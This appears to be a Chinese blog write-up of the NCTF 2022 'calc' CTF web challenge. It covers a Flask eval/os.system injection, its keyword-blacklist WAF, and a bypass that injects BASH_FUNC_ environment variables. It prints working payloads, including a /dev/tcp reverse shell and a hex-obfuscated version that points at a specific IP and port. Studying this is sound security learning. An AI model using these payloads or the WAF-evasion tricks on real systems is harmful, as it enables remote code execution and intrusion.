[NCTF2022]calc学习

最新推荐文章于 2023-05-30 00:01:18 发布
最新推荐文章于 2023-05-30 00:01:18 发布
阅读量590 收藏 2
点赞数 2
文章标签: python web安全
Aiwin
本文链接:https://blog.csdn.net/weixin_53090346/article/details/129898635
版权

文章目录

前言

之前有NCTF2022有碰到过一题类似于计算器的题目,当时以为是SSTI,结果发现是os.system()命令执行,但是又没想到怎么绕过,今天在NSS平台又看到了这题,复现一下,学到了不少东西。

[NCTF 2022]calc

  1. 进入题目是一个计算器
    file

在前端的javascript源代码中不难发现请求的url,令url报错可看到源代码

  1. 原比赛题目程序源代码如下:
@app.route("/calc", methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S", time.localtime()), ip,num)
    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"
def waf(s):
    blacklist = ['import', '(', ')', '#', '@', '^', '$', ',', '>', '?', '`', ' ', '_', '|', ';', '"', '{', '}', '&',
                 'getattr', 'os', 'system', 'class', 'subclasses', 'mro', 'request', 'args', 'eval', 'if', 'subprocess',
                 'file', 'open', 'popen', 'builtins', 'compile', 'execfile', 'from_pyfile', 'config', 'local', 'self',
                 'item', 'getitem', 'getattribute', 'func_globals', '__init__', 'join', '__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag = False
            print(no)
            break
    return flag

很明显第一种想到的思路就是通过传入num,从而控制log参数,进行os.system()的命令执行,还要满足的一个条件就是eval()不难报错。

这里的绕过方式有通过换行的形式,用单引号或双引号包裹传入的代码,使其成为字符串,满足eval()的正常执行,又能够命令执行。

测试如下:

file

import time
import os
import urllib.parse

ip = '127.0.0.1'
num = urllib.parse.unquote('%0A%22whoami%22%0A')
print('num:\n'+num)
log = "echo {0} {1} {2}> log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)
data = eval(num)
os.system(log)

file

可以看到确实执行了id命令,那么就可以通过这种方式进行反弹shell或者curl外带从而得到flag。

以上解法是非预期解,在NSS复现的时候源码是被修改了,直接去除了num,导致log参数不可控

@app.route("/calc", methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S", time.localtime()), ip)
    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"
def waf(s):
    blacklist = ['import', '(', ')', '#', '@', '^', '$', ',', '>', '?', '`', ' ', '_', '|', ';', '"', '{', '}', '&',
                 'getattr', 'os', 'system', 'class', 'subclasses', 'mro', 'request', 'args', 'eval', 'if', 'subprocess',
                 'file', 'open', 'popen', 'builtins', 'compile', 'execfile', 'from_pyfile', 'config', 'local', 'self',
                 'item', 'getitem', 'getattribute', 'func_globals', '__init__', 'join', '__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag = False
            print(no)
            break
    return flag

这里就是需要使用预期解来进行,预期解与P神的一篇环境变量注入导致命令执行的文章有关。

文章链接:https://www.leavesongs.com/PENETRATION/how-I-hack-bash-through-environment-injection.html

根据P神的解释,主要与一段bash的一段源代码有关:

for (string_index = 0; env && (string = env[string_index++]); ) {
    name = string;
    // ...

    if (privmode == 0 && read_but_dont_execute == 0 && 
        STREQN (BASHFUNC_PREFIX, name, BASHFUNC_PREFLEN) &&
        STREQ (BASHFUNC_SUFFIX, name + char_index - BASHFUNC_SUFFLEN) &&
        STREQN ("() {", string, 4))
    {
        size_t namelen;
        char *tname;        /* desired imported function name */

        namelen = char_index - BASHFUNC_PREFLEN - BASHFUNC_SUFFLEN;

        tname = name + BASHFUNC_PREFLEN;    /* start of func name */
        tname[namelen] = '\0';      /* now tname == func name */

        string_length = strlen (string);
        temp_string = (char *)xmalloc (namelen + string_length + 2);

        memcpy (temp_string, tname, namelen);
        temp_string[namelen] = ' ';
        memcpy (temp_string + namelen + 1, string, string_length + 1);

        /* Don't import function names that are invalid identifiers from the
         environment in posix mode, though we still allow them to be defined as
         shell variables. */
        if (absolute_program (tname) == 0 && (posixly_correct == 0 || legal_identifier (tname)))
            parse_and_execute (temp_string, tname, SEVAL_NONINT|SEVAL_NOHIST|SEVAL_FUNCDEF|SEVAL_ONECMD);
        else
            free (temp_string);     /* parse_and_execute does this */
        //...
    }
}

privmode == 0,即不能传入-p参数
read_but_dont_execute == 0,即不能传入-n参数
STREQN (BASHFUNC_PREFIX, name, BASHFUNC_PREFLEN),环境变量名前10个字符等于BASH_FUNC_
STREQ (BASHFUNC_SUFFIX, name + char_index - BASHFUNC_SUFFLEN),环境变量名后两个字符等于%%
STREQN ("() {", string, 4),环境变量的值前4个字符等于() {

主要的payload如下:env $‘BASH_FUNC_myfunc%%=() { id; }’ bash -c ‘myfunc’,即传入了一个环境变量,
使得bash添加了一个myfunc函数并执行,执行了id的命令。

在python中,可以利用eval函数进行环境变量的覆盖,再联合以上的payload进行命令执行。

测试如下:

import os
a={"test":'aaaa'}
for os.environ['test'] in['TESTTESTTEST']:
    pass
print(os.environ['test'])

file

当使用上list生成器和中括号后,就可以进行变量覆盖的同时,又返回一个str,没有进行执行。

import os
a={"test":'aaaa'}
print([[str][0]for[os.environ['test']]in[['TESTTESTTEST']]])
print(os.environ['test'])

那么就可以通过这种方式注入环境变量,使得被bash执行,payload如下:
[[str][0]for[os.environ[‘BASH_FUNC_echo%%’]]in[[‘() { bash -i >& /dev/tcp/xx.xx.xx.xx/xxxx 0>&1;}’]]]

剩下最后的就是绕过waf,这里的waf需要绕过os,空格等,同样再绕过SSTI的时候我们知道,在python中用单引号和双引号
包裹的字符是能够识别十六进制字符串的,因此可以变成十六进制字符串绕过,绕过os,则可以变成utf8非ascii字符格式,
从而达到统一格式变成os。

file

最终payload:

[[str][0]for[ᵒs.environ['BASH\x5fFUNC\x5fecho%%']]in[['\x28\x29\x20\x7b\x20\x62\x61\x73\x68\x20\x2d\x69\x20\x3e\x26\x20\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x31\x32\x30\x2e\x37\x39\x2e\x32\x39\x2e\x31\x37\x30\x2f\x36\x36\x36\x36\x20\x30\x3e\x26\x31\x3b\x7d']]]

file

总结

比赛时非预期解主要通过换行绕过eval的报错,预期解涉及到了不少的tricks,包括python的变量覆盖和系统底层通过注入环境变量来getshell,学到很多。

M03-Aiwin
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
[NCTF 2022]calc
rev1ve的博客
12-27 480
不过本地试了下不行,但是这种遍历赋值的方式对于字典的处理上不太一样,可以直接覆盖指定key的值,所以在对于我们的目标,覆盖os.environ是完全可行的。最后就是如何绕过os的检测,考点是python在处理utf-8中的非ascii字符的时候,会被转化成统一的标准格式。前两个条件肯定是满足的,后三个条件是用户可控的,所以这个if语句是肯定可以进入的。由于环境变量中是以字典的形式存在的,我们需要用到for来进行变量覆盖。我们抓包,然后将payload编码一下即可,成功反弹shell。只需要满足下面情况,
NCTF2022 Web Writeup
渗透测试研究中心
12-08 669
1.calc 题目地址:http://116.205.139.166:8001/ 右键 /source 源码 @app.route("/calc",methods=['GET']) def calc(): ip = request.remote_addr num = request.values.get("num") log = "echo {0}{1}{2}> ...
2022 NCTF
qq_53142368的博客
12-05 853
2022 NCTF
pyjail初了解
Aiwin的博客
05-30 2041
pyjail初了解
NCTF2022 calc题目复现
m0_62422842的博客
12-10 1137
这都是在基于system函数执行的条件下(无论是php还是python),底层调用sh二进制文件,我们都可以注入环境变量来rce。换句话说,如果底层调用了sh -c命令的函数执行的话,具有环境变量注入条件,使用这个方法来getshell应该是可以的。这个赛题个人感觉质量很高,能够从中学习到很多知识。
2024NCTF部分题目资源包
02-06
作为国内TOP CTF战队,Nu1LTeam自2015年10月成立以来,斩获了国内外众多赛事冠军以及闯入DEFCON CTF总决赛,这得益于Nu1L每一位队员的努力。 我们期望发掘以及培养年轻力量,于是自2023年开始,我们决定举办N1CTF ...
H&NCTF 2024 Re 全解WP(带附件加详细解析)
最新发布
05-30
H&NCTF 2024 Re 全解WP(带附件加详细解析)
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
05-29
H&NCTF2024-Re-RWhackA(病毒程序逆向分析)
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
05-26
H&NCTF2024-Re-Ezshoping(网络商城apk抓包逆向)
harmonyos2-Inn0vHackti0n.github.io:Inn0vHackti0nCTF团队网站
07-01
和声2 和谐 Harmony 是一个响应式 jekyll 主题。 为 jekyll 2.x 构建 支持 Google 分析和 RSS 提要 基于 Sass ...是一个静态站点生成器,一个开源工具,用于创建各种形状和大小的简单而强大的网站。...j
【集训DAY11】Calc【数学】
ha
07-21 78
数学
2022NCTF的部分wp及复现
v2ish1yan的博客
12-14 519
2022NCTF的部分wp
nctf-/x00
电风
05-06 1395
1.http://teamxlc.sinaapp.com/web4/f5a14f5e6e3453b78cd73899bad98d53/index.php if (isset ($_GET['nctf'])) { if (@ereg ("^[1-9]+$", $_GET['nctf']) === FALSE) echo '必须输入数字才行'; e
NCTF 南京邮电大学网络攻防平台 writeup(web部分)持续更新
Taowood的博客
07-22 8017
题目来源,南京邮电大学网络攻防训练平台 http://ctf.nuptzj.cn/   一、签到题 迷雾与真相就隔着一个F12,得flag ctf{flag_admiaanaaaaaaaaaaa}   二、md5 collision 题目描述如下 源码 <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5...
Writeup of NCTF
风沐白的岚
08-07 1667
南京邮电大学网络攻防训练平台 md5 collision <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else { e
南邮CTF练习题——web
热门推荐
dcison的博客
11-11 4万+
南邮CTF部分题解
NCTF2018部分题WP(2)
单核CPU的小朋友的博客
11-27 3万+
第一题:滴!晨跑打卡 这道题过滤了空格,但是可以使用url编码来绕过,这里我们可以使用%a0,也就是加号来绕过。 首先查列数: 编码:1%27%a0union%a0select%a01,2,3%27# 很明显可以查出是三列。 然后就是查数据库名: 编码:id=1%27%a0union%a0select%a01,(SELECT%a0GROUP_CONCAT(SCHEMA_NAME)%a0FROM%...
NCTF 2019 Re Writeup(四题)
siphre
11-25 896
reverse 一、DEBUG ELF动态调试,flag长度24字节,用户输入的字符串跟经过处理后的字符串s做校验。因为变量s是经过处理的,得在cmp dl,al下断看eax寄存器的值,可以看到最终比较的时候s的值。 手抄s的值出来,再python翻译成字符串即可。 flag=[0x4E,0x43,0x54,0x46,0x7b,0x6a,0x75,0x73,0x74,0x5f,0x6...
NCTF 南京邮电大学网络攻防训练平台 WriteUp
Ni9htMar3的博客
12-21 2万+
WEB 签到题1 md5 collision 签到题2 这题不是WEB 层层递进 AAencode 单身二十年 你从哪里来 php decode 文件包含 单身一百年也没有用 Download~! COOKIE MYSQL sql injection 3 /x00 bypass again 变量覆盖 PHP是世界上最好的语言 伪装者 Header 上传绕过 SQL注入1 pass chack 起名字很难 密码重置 p
[NCTF2019]SQLi
07-28
\[NCTF2019\]SQLi是一个CTF比赛中的题目,涉及到SQL注入。根据引用\[1\]和引用\[2\]的内容,可以得知在该题目中,通过构造特定的SQL语句,可以绕过过滤,获取到管理员的密码,从而获得flag。具体的解题思路是通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M03-Aiwin

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值